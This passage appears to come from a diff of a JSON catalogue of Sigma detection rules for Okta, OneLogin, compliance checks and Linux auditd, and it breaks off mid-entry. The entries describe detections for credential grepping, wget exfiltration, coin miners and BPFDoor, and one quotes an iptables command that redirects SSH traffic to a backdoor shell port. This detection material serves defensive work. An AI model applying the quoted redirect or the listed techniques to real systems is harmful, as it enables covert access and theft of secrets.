is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "okta" - } - }, - { - "description": "Detects when an Policy Rule is Modified or Deleted.", - "uuid": "0c97c1d3-4057-45c9-b148-1de94b631931", - "value": "Okta Policy Rule Modified or Deleted", - "meta": { - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/12", - "filename": "okta_policy_rule_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "okta" - } - }, - { - "description": "Detects when an security threat is detected in Okta.", - "uuid": "5c82f0b9-3c6d-477f-a318-0e14a1df73e0", - "value": "Okta Security Threat Detected", - "meta": { - "refs": [ - "https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm", - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_security_threat_detected.yml" - ], - "tags": "No established tags", - "creation_date": "2021/09/12", - "filename": "okta_security_threat_detected.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "okta" - } - }, - { - "description": "Detects when unauthorized access to app occurs.", - "uuid": "6cc2b61b-d97e-42ef-a9dd-8aa8dc951657", - "value": "Okta Unauthorized Access to App", - "meta": { - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_unauthorized_access_to_app.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/12", - "filename": "okta_unauthorized_access_to_app.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "User might of believe that they had access." - ], - "logsource.category": "No established category", - "logsource.product": "okta" - } - }, - { - "description": "Detects when an user account is locked out.", - "uuid": "14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a", - "value": "Okta User Account Locked Out", - "meta": { - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_account_locked_out.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/12", - "filename": "okta_user_account_locked_out.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "okta" - } - }, - { - "description": "Detects when an user assumed another user account.", - "uuid": "62fff148-278d-497e-8ecd-ad6083231a35", - "value": "OneLogin User Assumed Another User", - "meta": { - "refs": [ - "https://developers.onelogin.com/api-docs/1/events/event-resource", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_assumed_another_user.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/10/12", - "filename": "onelogin_assumed_another_user.yml", - "author": "Austin Songer @austinsonger", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "onelogin" - } - }, - { - "description": "Detects when an user account is locked or suspended.", - "uuid": "a717c561-d117-437e-b2d9-0118a7035d01", - "value": "OneLogin User Account Locked", - "meta": { - "refs": [ - "https://developers.onelogin.com/api-docs/1/events/event-resource/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_user_account_locked.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/10/12", - "filename": "onelogin_user_account_locked.yml", - "author": "Austin Songer @austinsonger", - "level": "low", - "falsepositive": [ - "System may lock or suspend user accounts." - ], - "logsource.category": "No established category", - "logsource.product": "onelogin" - } - }, - { - "description": "Before deploying any new asset, change all default passwords to have values consistent with administrative level accounts.\nSigma detects default credentials usage. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.\n", - "uuid": "1a395cbc-a84a-463a-9086-ed8a70e573c7", - "value": "Default Credentials Usage", - "meta": { - "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists", - "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml" - ], - "tags": "No established tags", - "creation_date": "2019/03/26", - "filename": "default_credentials_usage.yml", - "author": "Alexandr Yampolskyi, SOC Prime", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "qualys" - } - }, - { - "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels.\nEnsure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.\n", - "uuid": "d7fb8f0e-bd5f-45c2-b467-19571c490d7e", - "value": "Cleartext Protocol Usage", - "meta": { - "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/firewall_cleartext_protocols.yml" - ], - "tags": "No established tags", - "creation_date": "2019/03/26", - "filename": "firewall_cleartext_protocols.yml", - "author": "Alexandr Yampolskyi, SOC Prime, Tim Shelton", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "firewall", - "logsource.product": "No established product" - } - }, - { - "description": "Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.\nSigma detects\nEvent ID 4728 indicates a \u2018Member is added to a Security Group\u2019.\nEvent ID 4729 indicates a \u2018Member is removed from a Security enabled-group\u2019 .\nEvent ID 4730 indicates a \u2018Security Group is deleted\u2019.\nThe case is not applicable for Unix OS.\nSupported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP.\n", - "uuid": "9cf01b6c-e723-4841-a868-6d7f8245ca6e", - "value": "Group Modification Logging", - "meta": { - "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634", - "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/group_modification_logging.yml" - ], - "tags": "No established tags", - "creation_date": "2019/03/26", - "filename": "group_modification_logging.yml", - "author": "Alexandr Yampolskyi, SOC Prime", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Host Without Firewall. Alert means not complied. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.", - "uuid": "6b2066c8-3dc7-4db7-9db0-6cc1d7b0dde9", - "value": "Host Without Firewall", - "meta": { - "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml" - ], - "tags": "No established tags", - "creation_date": "2019/03/19", - "filename": "host_without_firewall.yml", - "author": "Alexandr Yampolskyi, SOC Prime", - "level": "low", - "falsepositive": "No established falsepositives", - "logsource.category": "No established category", - "logsource.product": "qualys" - } - }, - { - "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels\nEnsure that an encryption is used for all sensitive information in transit.\nEnsure that an encrypted channels is used for all administrative account access.\n", - "uuid": "7e4bfe58-4a47-4709-828d-d86c78b7cc1f", - "value": "Cleartext Protocol Usage Via Netflow", - "meta": { - "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml" - ], - "tags": "No established tags", - "creation_date": "2019/03/26", - "filename": "netflow_cleartext_protocols.yml", - "author": "Alexandr Yampolskyi, SOC Prime", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "No established product" - } - }, - { - "description": "Automatically lock workstation sessions after a standard period of inactivity.\nThe case is not applicable for Unix OS. Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019.\n", - "uuid": "411742ad-89b0-49cb-a7b0-3971b5c1e0a4", - "value": "Locked Workstation", - "meta": { - "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800", - "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/workstation_was_locked.yml" - ], - "tags": "No established tags", - "creation_date": "2019/03/26", - "filename": "workstation_was_locked.yml", - "author": "Alexandr Yampolskyi, SOC Prime", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects change of user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell.", - "uuid": "e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9", - "value": "Edit of .bash_profile and .bashrc", - "meta": { - "refs": [ - "MITRE Attack technique T1156; .bash_profile and .bashrc. ", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_alter_bash_profile.yml" - ], - "tags": [ - "attack.s0003", - "attack.persistence", - "attack.t1546.004" - ], - "creation_date": "2019/05/12", - "filename": "lnx_auditd_alter_bash_profile.yml", - "author": "Peter Matkovski", - "level": "medium", - "falsepositive": [ - "Admin or User activity" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects attempts to record audio with arecord utility", - "uuid": "a7af2487-9c2f-42e4-9bb9-ff961f0561d5", - "value": "Audio Capture", - "meta": { - "refs": [ - "https://linux.die.net/man/1/arecord", - "https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa", - "https://attack.mitre.org/techniques/T1123/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_audio_capture.yml" - ], - "tags": [ - "attack.collection", - "attack.t1123" - ], - "creation_date": "2021/09/04", - "filename": "lnx_auditd_audio_capture.yml", - "author": "Pawel Mazur", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detect changes in auditd configuration files", - "uuid": "977ef627-4539-4875-adf4-ed8f780c4922", - "value": "Auditing Configuration Changes on Linux Host", - "meta": { - "refs": [ - "https://github.com/Neo23x0/auditd/blob/master/audit.rules", - "Self Experience", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_auditing_config_change.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.006" - ], - "creation_date": "2019/10/25", - "filename": "lnx_auditd_auditing_config_change.yml", - "author": "Mikhail Larin, oscd.community", - "level": "high", - "falsepositive": [ - "Legitimate administrative activity" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware.\nThis rule detect using dd and truncate to add a junk data to file.\n", - "uuid": "c52a914f-3d8b-4b2a-bb75-b3991e75f8ba", - "value": "Binary Padding - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_binary_padding.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.001" - ], - "creation_date": "2020/10/13", - "filename": "lnx_auditd_binary_padding.yml", - "author": "Igor Fits, oscd.community", - "level": "high", - "falsepositive": [ - "Legitimate script work" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "detects BPFDoor .lock and .pid files access in temporary file storage facility", - "uuid": "808146b2-9332-4d78-9416-d7e47012d83d", - "value": "BPFDoor Abnormal Process ID or Lock File Accessed", - "meta": { - "refs": [ - "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", - "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106", - "attack.t1059" - ], - "creation_date": "2022/08/10", - "filename": "lnx_auditd_bpfdoor_file_accessed.yml", - "author": "Rafal Piasecki", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'\nThe traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.\n", - "uuid": "70b4156e-50fc-4523-aa50-c9dddf1993fc", - "value": "Bpfdoor TCP Ports Redirect", - "meta": { - "refs": [ - "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", - "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ], - "creation_date": "2022/08/10", - "filename": "lnx_auditd_bpfdoor_port_redirect.yml", - "author": "Rafal Piasecki", - "level": "medium", - "falsepositive": [ - "Legitimate ports redirect" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.", - "uuid": "fe10751f-1995-40a5-aaa2-c97ccb4123fe", - "value": "Linux Capabilities Discovery", - "meta": { - "refs": [ - "https://man7.org/linux/man-pages/man8/getcap.8.html", - "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/", - "https://mn3m.info/posts/suid-vs-capabilities/", - "https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml" - ], - "tags": [ - "attack.collection", - "attack.privilege_escalation", - "attack.t1123", - "attack.t1548" - ], - "creation_date": "2021/11/28", - "filename": "lnx_auditd_capabilities_discovery.yml", - "author": "Pawel Mazur", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detect file time attribute change to hide new or changes to existing files.", - "uuid": "b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b", - "value": "File Time Attribute Change - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.006" - ], - "creation_date": "2020/10/15", - "filename": "lnx_auditd_change_file_time_attr.yml", - "author": "Igor Fits, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects removing immutable file attribute.", - "uuid": "a5b977d6-8a81-4475-91b9-49dbfcd941f7", - "value": "Remove Immutable File Attribute - Auditd", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1222.002" - ], - "creation_date": "2019/09/23", - "filename": "lnx_auditd_chattr_immutable_removal.yml", - "author": "Jakob Weinzettl, oscd.community", - "level": "medium", - "falsepositive": [ - "Administrator interacting with immutable files (e.g. for instance backups)." - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", - "uuid": "214e7e6c-f21b-47ff-bb6f-551b2d143fcf", - "value": "Clipboard Collection with Xclip Tool - Auditd", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1115/", - "https://linux.die.net/man/1/xclip", - "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml" - ], - "tags": [ - "attack.collection", - "attack.t1115" - ], - "creation_date": "2021/09/24", - "filename": "lnx_auditd_clipboard_collection.yml", - "author": "Pawel Mazur", - "level": "low", - "falsepositive": [ - "Legitimate usage of xclip tools" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", - "uuid": "f200dc3f-b219-425d-a17e-c38467364816", - "value": "Clipboard Collection of Image Data with Xclip Tool", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1115/", - "https://linux.die.net/man/1/xclip", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml" - ], - "tags": [ - "attack.collection", - "attack.t1115" - ], - "creation_date": "2021/10/01", - "filename": "lnx_auditd_clipboard_image_collection.yml", - "author": "Pawel Mazur", - "level": "low", - "falsepositive": [ - "Legitimate usage of xclip tools" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects command line parameter very often used with coin miners", - "uuid": "071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed", - "value": "Possible Coin Miner CPU Priority Param", - "meta": { - "refs": [ - "https://xmrig.com/docs/miner/command-line-options", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_coinminer.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ], - "creation_date": "2021/10/09", - "filename": "lnx_auditd_coinminer.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Other tools that use a --cpu-priority flag" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", - "uuid": "759d0d51-bc99-4b5e-9add-8f5b2c8e7512", - "value": "Creation Of An User Account", - "meta": { - "refs": [ - "MITRE Attack technique T1136; Create Account ", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml" - ], - "tags": [ - "attack.t1136.001", - "attack.persistence" - ], - "creation_date": "2020/05/18", - "filename": "lnx_auditd_create_account.yml", - "author": "Marie Euler", - "level": "medium", - "falsepositive": [ - "Admin activity" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects exploitation attempt of vulnerability described in CVE-2021-3156.\nAlternative approach might be to look for flooding of auditd logs due to bruteforcing\nrequired to trigger the heap-based buffer overflow.\n", - "uuid": "5ee37487-4eb8-4ac2-9be1-d7d14cdc559f", - "value": "CVE-2021-3156 Exploitation Attempt", - "meta": { - "refs": [ - "https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "cve.2021.3156" - ], - "creation_date": "2021/02/01", - "filename": "lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects exploitation attempt of vulnerability described in CVE-2021-3156.\nAlternative approach might be to look for flooding of auditd logs due to bruteforcing.\nrequired to trigger the heap-based buffer overflow.\n", - "uuid": "b9748c98-9ea7-4fdb-80b6-29bed6ba71d2", - "value": "CVE-2021-3156 Exploitation Attempt Bruteforcing", - "meta": { - "refs": [ - "https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "cve.2021.3156" - ], - "creation_date": "2021/02/01", - "filename": "lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects exploitation attempt of vulnerability described in CVE-2021-4034.", - "uuid": "40a016ab-4f48-4eee-adde-bbf612695c53", - "value": "CVE-2021-4034 Exploitation Attempt", - "meta": { - "refs": [ - "https://github.com/berdav/CVE-2021-4034", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034", - "https://access.redhat.com/security/cve/CVE-2021-4034", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ], - "creation_date": "2022/01/27", - "filename": "lnx_auditd_cve_2021_4034.yml", - "author": "Pawel Mazur", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", - "uuid": "a3b5e3e9-1b49-4119-8b8e-0344a01f21ee", - "value": "Data Compressed", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_compressed.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1560.001" - ], - "creation_date": "2019/10/21", - "filename": "lnx_auditd_data_compressed.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate use of archiving tools by legitimate user." - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects attempts to post the file with the usage of wget utility.\nThe adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.\n", - "uuid": "cb39d16b-b3b6-4a7a-8222-1cf24b686ffc", - "value": "Data Exfiltration with Wget", - "meta": { - "refs": [ - "https://attack.mitre.org/tactics/TA0010/", - "https://linux.die.net/man/1/wget", - "https://gtfobins.github.io/gtfobins/wget/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ], - "creation_date": "2021/11/18", - "filename": "lnx_auditd_data_exfil_wget.yml", - "author": "Pawel Mazur", - "level": "medium", - "falsepositive": [ - "Legitimate usage of wget utility to post a file" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects overwriting (effectively wiping/deleting) of a file.", - "uuid": "37222991-11e9-4b6d-8bdf-60fbe48f753e", - "value": "Overwriting the File with Dev Zero or Null", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_dd_delete_file.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ], - "creation_date": "2019/10/23", - "filename": "lnx_auditd_dd_delete_file.yml", - "author": "Jakob Weinzettl, oscd.community", - "level": "low", - "falsepositive": [ - "Appending null bytes to files.", - "Legitimate overwrite of files." - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.", - "uuid": "53059bc0-1472-438b-956a-7508a94a91f0", - "value": "Disable System Firewall", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", - "https://attack.mitre.org/techniques/T1562/004/", - "https://firewalld.org/documentation/man-pages/firewall-cmd.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml" - ], - "tags": [ - "attack.t1562.004", - "attack.defense_evasion" - ], - "creation_date": "2022/01/22", - "filename": "lnx_auditd_disable_system_firewall.yml", - "author": "Pawel Mazur", - "level": "high", - "falsepositive": [ - "Admin activity" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects file and folder permission changes.", - "uuid": "74c01ace-0152-4094-8ae2-6fd776dd43e5", - "value": "File or Folder Permissions Change", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1222.002" - ], - "creation_date": "2019/09/23", - "filename": "lnx_auditd_file_or_folder_permissions.yml", - "author": "Jakob Weinzettl, oscd.community", - "level": "low", - "falsepositive": [ - "User interacting with files permissions (normal/daily behaviour)." - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detecting attempts to extract passwords with grep", - "uuid": "df3fcaea-2715-4214-99c5-0056ea59eb35", - "value": "Credentials In Files - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.001" - ], - "creation_date": "2020/10/15", - "filename": "lnx_auditd_find_cred_in_files.yml", - "author": "Igor Fits, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character", - "uuid": "d08722cd-3d09-449a-80b4-83ea2d9d4616", - "value": "Hidden Files and Directories", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", - "https://attack.mitre.org/techniques/T1564/001/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ], - "creation_date": "2021/09/06", - "filename": "lnx_auditd_hidden_files_directories.yml", - "author": "Pawel Mazur", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects appending of zip file to image", - "uuid": "45810b50-7edc-42ca-813b-bdac02fb946b", - "value": "Steganography Hide Zip Information in Picture File", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1027/003/", - "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.003" - ], - "creation_date": "2021/09/09", - "filename": "lnx_auditd_hidden_zip_files_steganography.yml", - "author": "Pawel Mazur", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detect attempt to enable auditing of TTY input", - "uuid": "49aae26c-450e-448b-911d-b3c13d178dfc", - "value": "Linux Keylogging with Pam.d", - "meta": { - "refs": [ - 